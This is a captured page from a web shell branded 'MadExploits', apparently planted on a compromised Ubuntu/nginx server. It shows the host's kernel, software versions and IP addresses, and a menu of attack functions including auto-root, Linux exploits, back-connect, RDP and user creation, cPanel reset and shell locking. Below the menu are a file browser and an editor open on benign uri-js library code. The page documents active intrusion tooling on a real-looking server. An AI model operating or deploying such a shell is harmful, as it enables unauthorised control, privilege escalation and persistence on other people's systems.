Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.159
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amatya /
node_modules /
uri-js /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
schemes
[ DIR ]
drwxr-xr-x
index.ts
394
B
-rw-r--r--
punycode.d.ts
594
B
-rw-r--r--
regexps-iri.ts
112
B
-rw-r--r--
regexps-uri.ts
7.89
KB
-rw-r--r--
uri.ts
19.04
KB
-rw-r--r--
util.ts
1.05
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : util.ts
export function merge(...sets:Array<string>):string { if (sets.length > 1) { sets[0] = sets[0].slice(0, -1); const xl = sets.length - 1; for (let x = 1; x < xl; ++x) { sets[x] = sets[x].slice(1, -1); } sets[xl] = sets[xl].slice(1); return sets.join(''); } else { return sets[0]; } } export function subexp(str:string):string { return "(?:" + str + ")"; } export function typeOf(o:any):string { return o === undefined ? "undefined" : (o === null ? "null" : Object.prototype.toString.call(o).split(" ").pop().split("]").shift().toLowerCase()); } export function toUpperCase(str:string):string { return str.toUpperCase(); } export function toArray(obj:any):Array<any> { return obj !== undefined && obj !== null ? (obj instanceof Array ? obj : (typeof obj.length !== "number" || obj.split || obj.setInterval || obj.call ? [obj] : Array.prototype.slice.call(obj))) : []; } export function assign(target: object, source: any): any { const obj = target as any; if (source) { for (const key in source) { obj[key] = source[key]; } } return obj; }
Close